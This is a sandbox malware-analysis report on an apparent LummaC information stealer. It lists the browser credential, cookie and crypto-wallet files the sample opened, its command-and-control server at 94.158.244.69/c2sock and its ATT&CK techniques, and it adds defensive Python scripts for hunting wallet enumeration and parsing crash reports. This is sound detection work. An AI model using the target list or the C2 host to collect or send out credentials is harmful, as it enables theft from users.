                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflalJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets (2x)
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet (4x)
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live (2x)
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb (2x)
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets (4x)
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets (2x)
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB (2x)
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Directory queried: C:\Users\user\Documents (3x)
Source: Yara match | File source: Process Memory Space: I2BJhmJou4.exe PID: 7500, type: MEMORYSTR
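The behaviour above is the signal a hunter wants to key on: not any single wallet-store open, which a wallet application does legitimately, but one desktop binary walking seven distinct wallet stores in one run. The script below is an added example, not part of the Joe Sandbox report or of any vendor tooling; it takes (pid, image path, opened path) tuples as an assumed stand-in for file-access telemetry (Sysmon, object-access auditing), uses the exact store paths from the report, and flags a PID once it has opened a threshold of distinct stores from an image not expected for that store. The allow-listed image name `electrum.exe`, PIDs 3101 and 4242, and the two benign events are constructed for the example; PID 7500 is the sample's PID in the report.

```python
"""Hunt for wallet-store enumeration by a single process.

Added example, not part of the Joe Sandbox report or of any vendor tooling.
The input format (pid, image path, opened path) is an assumption standing in
for file-access telemetry such as Sysmon or Windows object-access auditing.
"""
import re
from collections import defaultdict

# Wallet stores the sample opened, as listed in the report (paths below the
# user profile). Case-insensitive prefix match.
WALLET_STORES = {
    r"AppData\Roaming\Electrum\wallets": "Electrum",
    r"AppData\Roaming\Exodus\exodus.wallet": "Exodus",
    r"AppData\Roaming\Ledger Live": "Ledger Live",
    r"AppData\Roaming\atomic\Local Storage\leveldb": "Atomic",
    r"AppData\Local\Coinomi\Coinomi\wallets": "Coinomi",
    r"AppData\Roaming\Bitcoin\wallets": "Bitcoin Core",
    r"AppData\Roaming\com.liberty.jaxx\IndexedDB": "Jaxx Liberty",
}

# Image names allowed to touch a given store. Assumption for this example:
# only Electrum's own binary is allow-listed; extend per estate.
EXPECTED_IMAGES = {"Electrum": {"electrum.exe"}}

PROFILE_RE = re.compile(r"^[A-Za-z]:\\Users\\[^\\]+\\(.+)$", re.IGNORECASE)


def wallet_for(path: str):
    """Return the wallet name if `path` lies inside a known store, else None."""
    m = PROFILE_RE.match(path)
    if not m:
        return None
    rel = m.group(1).lower()
    for prefix, name in WALLET_STORES.items():
        p = prefix.lower()
        if rel == p or rel.startswith(p + "\\"):
            return name
    return None


def hunt(events, threshold: int = 3):
    """Group wallet-store opens by PID and report PIDs that reached `threshold`
    distinct stores from an image not expected for that store.

    One open can be legitimate; seven distinct stores opened by one desktop
    binary, as in the report, is stealer-style enumeration.
    Returns {pid: (image, sorted wallet names)}.
    """
    stores = defaultdict(set)
    image_of = {}
    for pid, image, opened in events:
        wallet = wallet_for(opened)
        if wallet is None:
            continue
        image_name = image.rsplit("\\", 1)[-1].lower()
        if image_name in EXPECTED_IMAGES.get(wallet, set()):
            continue
        stores[pid].add(wallet)
        image_of[pid] = image
    return {pid: (image_of[pid], sorted(w))
            for pid, w in stores.items() if len(w) >= threshold}


SAMPLE_EXE = r"C:\Users\user\Desktop\I2BJhmJou4.exe"
# Constructed events: the opens from the report, attributed to PID 7500 (the
# sample's PID in the report), plus two benign events for contrast.
SAMPLE_EVENTS = [
    (7500, SAMPLE_EXE, r"C:\Users\user\AppData\Roaming\Electrum\wallets"),
    (7500, SAMPLE_EXE, r"C:\Users\user\AppData\Roaming\Exodus\exodus.wallet"),
    (7500, SAMPLE_EXE, r"C:\Users\user\AppData\Roaming\Exodus\exodus.wallet"),
    (7500, SAMPLE_EXE, r"C:\Users\user\AppData\Roaming\Ledger Live"),
    (7500, SAMPLE_EXE, r"C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb"),
    (7500, SAMPLE_EXE, r"C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets"),
    (7500, SAMPLE_EXE, r"C:\Users\user\AppData\Roaming\Bitcoin\wallets"),
    (7500, SAMPLE_EXE, r"C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB"),
    (7500, SAMPLE_EXE, r"C:\Users\user\Documents"),
    # benign (constructed): the wallet app reading its own store
    (3101, r"C:\Program Files\Electrum\electrum.exe",
     r"C:\Users\user\AppData\Roaming\Electrum\wallets\default_wallet"),
    # benign (constructed): an editor opening a document
    (4242, r"C:\Windows\notepad.exe", r"C:\Users\user\Documents\notes.txt"),
]

if __name__ == "__main__":
    for pid, (image, wallets) in hunt(SAMPLE_EVENTS).items():
        print(f"PID {pid} {image} opened {len(wallets)} wallet stores: "
              f"{', '.join(wallets)}")
```

Run against the constructed events, only PID 7500 is reported, with all seven stores; the Electrum process and notepad are not. The threshold is the tuning knob: a single store is noisy (backup agents, indexers), whereas three or more distinct stores from one non-wallet image is rarely anything but a stealer.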

Remote Access Functionality

Source: Yara match | File source: 0.2.I2BJhmJou4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.I2BJhmJou4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.I2BJhmJou4.exe.49f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1423642848.00000000049F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: I2BJhmJou4.exe PID: 7500, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix

Techniques per tactic, in the order the report's matrix lists them. A number in parentheses is the count of matched signatures for that technique; entries without a count are unmatched matrix placeholders.

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: Native API (11), Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
Persistence: LSASS Driver (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Privilege Escalation: Process Injection (1), LSASS Driver (1), DLL Side-Loading (1), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Defense Evasion: Virtualization/Sandbox Evasion (32), Process Injection (1), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), Software Packing (2), DLL Side-Loading (1), Compile After Delivery, Indicator Removal from Tools
Credential Access: OS Credential Dumping (1), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery: System Time Discovery (2), Security Software Discovery (471), Virtualization/Sandbox Evasion (32), Process Discovery (2), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (11), System Information Discovery (13)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
Collection: Archive Collected Data (1), Data from Local System (31), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
Command and Control: Encrypted Channel (2), Non-Application Layer Protocol (1), Application Layer Protocol (11), Protocol Impersonation, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
Antivirus, Machine Learning and Genetic Malware Detection

Initial sample
  Source          Detection  Scanner         Label
  I2BJhmJou4.exe  84%        ReversingLabs   Win32.Trojan.Smokeloader
  I2BJhmJou4.exe  100%       Joe Sandbox ML

Dropped files: no antivirus matches
Unpacked PE files: no antivirus matches
Domains: no antivirus matches

URLs
  URL                          Detection  Scanner          Label
  http://94.158.244.69/KH0     0%         Avira URL Cloud  safe
  http://94.158.244.69/c2socklb:  0%      Avira URL Cloud  safe
  http://94.158.244.69/yH      0%         Avira URL Cloud  safe
  http://94.158.244.69/c2socks 0%         Avira URL Cloud  safe
  http://94.158.244.69/oH      0%         Avira URL Cloud  safe
  http://94.158.244.69/c2sockab?  0%      Avira URL Cloud  safe
  http://94.158.244.69/%OB     0%         Avira URL Cloud  safe

Note that the static verdicts disagree with the behavioural one: ReversingLabs labels the file Win32.Trojan.Smokeloader while the sandbox classifies it as LummaC Stealer, and Avira URL Cloud rates every observed variant of the C2 URL as safe with 0% detection. URL reputation lags behind fresh stealer infrastructure; treat 94.158.244.69 as malicious on the strength of the Suricata alert, the C2 URL extracted from the malware configuration and the context matches further down this report.
Contacted domains: no contacted domains info

Contacted URLs
  Name                         Malicious  Antivirus detection  Reputation
  http://94.158.244.69/c2sock  false      -                    high
URLs from memory and binary data (Name | Source | Malicious | Antivirus detection | Reputation)

https://duckduckgo.com/chrome_newtab | I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://94.158.244.69/c2socks | I2BJhmJou4.exe, 00000000.00000002.3246415805.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp; I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056E5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://upx.sf.net | Amcache.hve.8.dr | false | - | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://ocsp.rootca1.amazontrust.com0: | I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://94.158.244.69/c2sockab? | I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056E5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | I2BJhmJou4.exe, 00000000.00000002.3252254739.0000000006403000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://94.158.244.69/c2socklb: | I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056E5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://94.158.244.69/%OB | I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000055E0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://94.158.244.69/KH0 | I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000055E0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://x1.c.lencr.org/0 | I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://x1.i.lencr.org/0 | I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://94.158.244.69/ | I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000055E0000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://94.158.244.69/oH | I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000055E0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://support.mozilla.org/products/firefoxgro.all | I2BJhmJou4.exe, 00000000.00000002.3252254739.0000000006403000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://94.158.244.69/yH | I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000055E0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Contacted IPs
  IP             Domain   Country              ASN    ASN name     Malicious
  94.158.244.69  unknown  Moldova Republic of  39798  MIVOCLOUDMD  true
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1555044
                                                        Start date and time:2024-11-13 10:52:40 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 7m 19s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:10
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:I2BJhmJou4.exe
                                                        renamed because original name is a hash value
                                                        Original Sample Name:16f4ab4f0ba6ebd746bcc6b032346ffb80f88814e78e103739af0e5569fee962.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@2/5@0/1
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HCA Information:
                                                        • Successful, ratio: 95%
                                                        • Number of executed functions: 59
                                                        • Number of non-executed functions: 104
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Override analysis time to 240s for sample files taking high CPU consumption
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 20.42.65.92
                                                        • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • VT rate limit hit for: I2BJhmJou4.exe
Timeline
  Time      Type             Description
  04:56:38  API Interceptor  1x Sleep call for process: WerFault.exe modified
Context: IPs

Match: 94.158.244.69
  Associated sample  Detection  Threat name     Context
  OlZzqwjrwO.exe     malicious  LummaC Stealer  94.158.244.69/c2sock
  Vd3tOP5WSD.exe     malicious  LummaC Stealer  94.158.244.69/c2sock
  g1kWKm20Z5.exe     malicious  LummaC Stealer  94.158.244.69/c2sock
  cgln32y2HF.exe     malicious  LummaC Stealer  94.158.244.69/c2sock
  4Oq9i3gm0g.exe     malicious  LummaC Stealer  94.158.244.69/c2sock
  RX7nieXlNm.exe     malicious  LummaC Stealer  94.158.244.69/c2sock
  5M5e9srxkE.exe     malicious  LummaC Stealer  94.158.244.69/c2sock
  dV01QsYySM.exe     malicious  LummaC Stealer  94.158.244.69/c2sock
  BeO2C8S5Ly.exe     malicious  LummaC Stealer  94.158.244.69/c2sock
  ToNaCrWjm7.exe     malicious  LummaC Stealer  94.158.244.69/c2sock

Context: Domains
  No context

Context: ASNs

Match: MIVOCLOUDMD
  Associated sample  Detection  Threat name     Context
  OlZzqwjrwO.exe     malicious  LummaC Stealer  94.158.244.69
  Vd3tOP5WSD.exe     malicious  LummaC Stealer  94.158.244.69
  g1kWKm20Z5.exe     malicious  LummaC Stealer  94.158.244.69
  cgln32y2HF.exe     malicious  LummaC Stealer  94.158.244.69
  4Oq9i3gm0g.exe     malicious  LummaC Stealer  94.158.244.69
  RX7nieXlNm.exe     malicious  LummaC Stealer  94.158.244.69
  5M5e9srxkE.exe     malicious  LummaC Stealer  94.158.244.69
  dV01QsYySM.exe     malicious  LummaC Stealer  94.158.244.69
  BeO2C8S5Ly.exe     malicious  LummaC Stealer  94.158.244.69
  ToNaCrWjm7.exe     malicious  LummaC Stealer  94.158.244.69

Context: JA3 fingerprints
  No context

Context: Dropped files
  No context
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):0.8423482439830231
                                                        Encrypted:false
                                                        SSDEEP:96:HEyYA3haHCslA4hclAS7Zf2QXIDcQqc6acEVcw3ZOeOO+HbHg/PB6HeaOy1EoqzV:kyYfCMYb0UevojGdzuiF8Z24IO8QLC
                                                        MD5:7E20C02C760B970A272638D3132B1F18
                                                        SHA1:DC4E32AD39F5DE08EA777235407803FBE3299D54
                                                        SHA-256:C4DEC0AD2909B6C6D565324ED07123129CBBE832F68AE3D1D3EDFD813DFD603A
                                                        SHA-512:74156CEE6DF706CCE73A40480F0D2C8FDF06E3D8B90B3847B3EAD7EACD38BC39F6D04592AF9108FF9754F4DC847ACE58BE498A61888C81633572E4AAB878446B
                                                        Malicious:true
                                                        Reputation:low
Preview (UTF-16LE with BOM, decoded):
Version=1
EventType=APPCRASH
EventTime=133759653925006305
ReportType=2
Consent=1
UploadTime=133759653928912512
ReportStatus=655456
ReportIdentifier=ac1319ab-d779-4ed1-ae4c-b7b64b7db42d
IntegratorReportIdentifier=aad42edc-6e34-4f62-8576-abae8aef2664
Wow64Host=34404
Wow64Guest=332
NsAppName=I2BJhmJou4.exe
AppSessionGuid=00001d4c-0001-0014-d9bf-c2e7b135db01
TargetAppId=W:0006dc0c466b8f47b51330713f3362459b8d0000ffff!0000a7f075ba37961545ae0a819bda5d2be28618d60d!I2BJhmJou4.exe
TargetApp (preview truncated)
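The WER report above is worth more to a responder than its "dropped file" label suggests: the second token of TargetAppId carries the SHA-1 of the crashed image (a7f075ba..., the sample's SHA-1 from the report header), and EventTime is a Windows FILETIME, so both the hash and the crash time can be recovered from the WER artefact even after the binary is gone. The parser below is an added example, not part of the Joe Sandbox report or of Microsoft tooling; its input is a constructed re-encoding of the decoded header fields above as UTF-16LE with a BOM, which is the on-disk form of Report.wer.

```python
"""Recover the crashing binary's SHA-1 and the crash time from a Windows Error
Reporting Report.wer file.

Added example, not part of the Joe Sandbox report. The constructed input below
reproduces the key=value header of the Report.wer captured by the sandbox,
re-encoded as UTF-16LE with a BOM, which is how WER writes the file.
"""
import codecs
import re
from datetime import datetime, timedelta, timezone

_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_utc(ft: int) -> datetime:
    """Convert a Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to UTC."""
    return _FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def parse_wer(data: bytes) -> dict:
    """Parse the key=value lines of a Report.wer file (UTF-16 with BOM)."""
    report = {}
    for line in data.decode("utf-16").splitlines():
        if "=" in line:
            key, value = line.split("=", 1)
            report[key.strip()] = value.strip()
    return report


def target_app_sha1(report: dict):
    """TargetAppId has the form 'W:<id>!<0000 + SHA-1 of image>!<image name>'.

    The trailing 40 hex digits of the middle token are the SHA-1 of the crashed
    executable, which survives even if the file was deleted from disk."""
    parts = report.get("TargetAppId", "").split("!")
    if len(parts) < 3:
        return None
    digest = parts[1][-40:].lower()
    return digest if re.fullmatch(r"[0-9a-f]{40}", digest) else None


def summarize(data: bytes) -> dict:
    """Pull the responder-relevant fields out of a Report.wer blob."""
    report = parse_wer(data)
    crash = filetime_to_utc(int(report["EventTime"]))
    return {
        "event_type": report.get("EventType"),
        "app": report.get("NsAppName"),
        "sha1": target_app_sha1(report),
        "crash_utc": crash.strftime("%Y-%m-%d %H:%M:%S"),
        "report_id": report.get("ReportIdentifier"),
    }


# Constructed sample: the decoded header fields shown in the report's preview.
_LINES = [
    "Version=1",
    "EventType=APPCRASH",
    "EventTime=133759653925006305",
    "ReportType=2",
    "Consent=1",
    "UploadTime=133759653928912512",
    "ReportStatus=655456",
    "ReportIdentifier=ac1319ab-d779-4ed1-ae4c-b7b64b7db42d",
    "IntegratorReportIdentifier=aad42edc-6e34-4f62-8576-abae8aef2664",
    "Wow64Host=34404",
    "Wow64Guest=332",
    "NsAppName=I2BJhmJou4.exe",
    "AppSessionGuid=00001d4c-0001-0014-d9bf-c2e7b135db01",
    "TargetAppId=W:0006dc0c466b8f47b51330713f3362459b8d0000ffff"
    "!0000a7f075ba37961545ae0a819bda5d2be28618d60d!I2BJhmJou4.exe",
]
SAMPLE_WER = codecs.BOM_UTF16_LE + "\r\n".join(_LINES).encode("utf-16-le")

if __name__ == "__main__":
    for key, value in summarize(SAMPLE_WER).items():
        print(f"{key}: {value}")
```

On the constructed input the recovered SHA-1 is a7f075ba37961545ae0a819bda5d2be28618d60d and the crash time is 2024-11-13 09:56:32 UTC, which agrees with the timestamp in the minidump's file-type line (Wed Nov 13 09:56:32 2024) and places the crash about four minutes after the analysis started at 10:52:40 +01:00.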
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:Mini DuMP crash report, 15 streams, Wed Nov 13 09:56:32 2024, 0x1205a4 type
                                                        Category:dropped
                                                        Size (bytes):41968
                                                        Entropy (8bit):2.4935738305279456
                                                        Encrypted:false
                                                        SSDEEP:192:fyQX3wNBFlgOSbfHJnfoFlD67/BbT+h/ar3HPLx4Nqn:LwTFpSbfHFgDuBi/aLvLwa
